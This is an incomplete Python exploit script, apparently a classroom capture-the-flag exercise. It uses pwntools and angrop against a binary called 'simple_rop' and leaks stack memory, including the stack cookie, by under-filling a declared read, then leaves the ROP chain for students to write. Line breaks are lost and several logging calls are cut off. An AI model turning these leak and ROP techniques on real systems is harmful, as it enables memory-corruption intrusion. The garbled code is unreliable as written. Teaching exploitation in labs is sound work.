from pwn import * import angr import angrop import logging import sys # Initialize the logger l = logging.getLogger(__name__) l.setLevel(logging.INFO) # Create an angr project so that angrop can analyze the binary p = angr.Project("simple_rop", load_options={"auto_load_libs": False}) # Allow angrop to find ROP gadgets to make chain generation easier"Getting ROP gadgets") rop = p.analyses.ROP() rop.find_gadgets(show_progress=False) # Define a constant to tell us how much data to request from the program DATA_AMOUNT = 128 # Use pwntools to spawn an instance of the binary if len(sys.argv) == 3:"Connecting to server") r = remote(*sys.argv[1:]) else:"Spawning process") r = process("./simple_rop") # Start communicating with the binary"Communicating . . .") # Tell the binary how much data we'll be working with r.recvuntil("Hi! How much do you want me to read?\n") r.sendline(str(DATA_AMOUNT)) # Send some data, but note that we send less than the amount we told it # that we would send r.recvuntil("OK, give me the stuff!\n") r.send("AAAAAAAA") # Receive the data that is echoed back to us # Note that this will include some *leaked* data; that is, it will contain data # internal to the program that we did not overwrite r.recvuntil("OK, here's what you said:\n") data = r.recv(DATA_AMOUNT) # Parse out the leaked data (we sent 8 bytes to fill in `legit_buf`) leaked_data = data[8:] # Parse out the stack cookie (the stack cookie is the 8 bytes immediately after # `legit_buf`). For more information on this, see the class website with a # picture of the stack layout). stack_cookie = leaked_data[:8]"Stack cookie is: %r" % stack_cookie) # Your turn! # Here's what you need to do: # (to be filled in during class discussion) # Useful tools: # Find addresses of GOT entries: $ readelf -r simple_rop # Find any function in from just two addresses: